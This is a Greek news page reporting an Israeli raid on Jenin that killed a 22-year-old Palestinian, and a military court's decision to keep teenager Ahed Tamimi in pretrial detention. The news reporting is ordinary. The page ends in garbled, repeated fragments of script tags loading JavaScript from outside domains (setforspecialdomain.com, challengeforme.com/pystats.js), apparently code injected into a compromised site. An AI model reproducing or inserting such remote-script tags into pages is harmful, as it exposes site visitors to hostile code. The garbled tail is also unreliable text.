Δυτική όχθη: Νεκρός σε συγκρούσεις 22χρονος Παλαιστίνιος – Παρατείνεται η κράτηση της έφηβης Παλαιστίνιας

Ισραηλινές δυνάμεις μπήκαν στην πόλη Τζενίν το βράδυ της Τετάρτης

Ένας νεαρός Παλαιστίνιος σκοτώθηκε την Τετάρτη, κατά τη διάρκεια συγκρούσεων με ισραηλινές δυνάμεις στο βόρειο τμήμα της Δυτικής Όχθης, ανακοίνωσε το παλαιστινιακό υπουργείο Υγείας.

Ισραηλινές δυνάμεις μπήκαν στην πόλη Τζενίν το βράδυ της Τετάρτης, σύμφωνα με αυτόπτες μάρτυρες, και οι συγκρούσεις που ξέσπασαν είχαν αποτέλεσμα να υπάρξουν “πολλοί τραυματίες”, ανέφερε η ισραηλινή αστυνομία.

Ο Άχμεντ Τζαράρ, ο Παλαιστίνιος που σκοτώθηκε, ήταν 22 ετών, διευκρίνισε το παλαιστινιακό υπουργείο Υγείας.

Τουλάχιστον δύο Παλαιστίνιοι συνελήφθησαν, ενώ οι συγκρούσεις συνεχίστηκαν για ώρα κατά τη διάρκεια της νύχτας, αφηγήθηκαν αυτόπτες μάρτυρες.

Βίντεο που μεταφορτώθηκαν στο Διαδίκτυο από κατοίκους της παλαιστινιακής πόλης εικονίζουν πολλά ισραηλινά στρατιωτικά οχήματα καθώς εισβάλλουν.

Κατά πληροφορίες που μετέδωσαν ισραηλινά ΜΜΕ, η επιδρομή ενδέχεται να συνδέεται με τον θάνατο πριν από μία εβδομάδα ενός εβραίου εποίκου στην κατεχόμενη Δυτική Όχθη. Ο ραβίνος Ραζιέλ Σέβα, 35 ετών, σκοτώθηκε από σφαίρες την 9η Ιανουαρίου ενώ κινείτο με αυτοκίνητο κοντά στον οικισμό Χαβάτ Γκιλάντ, λίγα χιλιόμετρα από τη Νάμπλους, όπου ζούσε. Ένα άλλο αυτοκίνητο τον πλησίασε και οι επιβαίνοντες σε αυτό άνοιξαν πυρ εναντίον του.

 

Παρατείνεται η κράτηση της έφηβης Παλαιστίνιας

Στη φυλακή μέχρι τη δίκη θα παραμείνει το κορίτσι που έγινε σύμβολο κατά της ισραηλινής κατοχής στη Δυτική Όχθη

Ισραηλινό στρατοδικείο αποφάσισε σήμερα να παραμείνει προφυλακισμένη μέχρι τη δίκη της η παλαιστίνια έφηβη Αχέντ Ταμίμι, η οποία έχει γίνει για τους Παλαιστινίους ένα σύμβολο της στράτευσης κατά της ισραηλινής κατοχής.

Η απόφαση, η οποία εκδόθηκε από στρατιωτικό δικαστή στη φυλακή Όφερ στην κατεχόμενη Δυτική Όχθη, σημαίνει ενδεχομένως ότι η Αχέντ Ταμίμι, η οποία είναι 16 ετών και συνελήφθη τον Δεκέμβριο όταν διανεμήθηκε ευρύτατα στο Ίντερνετ ένα βίντεο που την δείχνει να χτυπάει ισραηλινούς στρατιώτες, μπορεί να μείνει υπό κράτηση επί μήνες.

«Δεν βλέπω άλλη εναλλακτική από να παραμείνει υπό κράτηση μέχρι το τέλος της διαδικασίας», δήλωσε ο στρατιωτικός δικαστής.

«Η σοβαρότητα των πράξεων για τις οποίες κατηγορείται δεν προσφέρει άλλη εναλλακτική από την κράτηση», πρόσθεσε.

Η Αχέντ Ταμίμι είναι μία από τους πρωταγωνιστές ενός βίντεο που τη δείχνει, μαζί με την εξαδέλφη της, την Νουρ, 20 ετών, να σπρώχνει δύο ισραηλινούς στρατιώτες και μετά να τους χτυπάει με κλωτσιές και γροθιές στις 15 Δεκεμβρίου στην Δυτική Όχθη, παλαιστινιακό έδαφος που βρίσκεται υπό ισραηλινή κατοχή εδώ και περισσότερο από 50 χρόνια.

Οι στρατιώτες παραμένουν απαθείς μπροστά στην κίνηση αυτή, η δράστης της οποίας μοιάζει να θέλει μάλλον να προκαλέσει, παρά να κάνει κακό.

Οι Παλαιστίνιοι πλέκουν τον εγκώμιο της Αχέντ Ταμίμι στα μέσα κοινωνικής δικτύωσης. Οι Ισραηλινοί χαιρέτισαν την απάθεια των στρατιωτών τους εκφράζοντας παράλληλα πικρία γι’ αυτό που θεωρήθηκε ταπείνωση από ταραχοποιούς.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>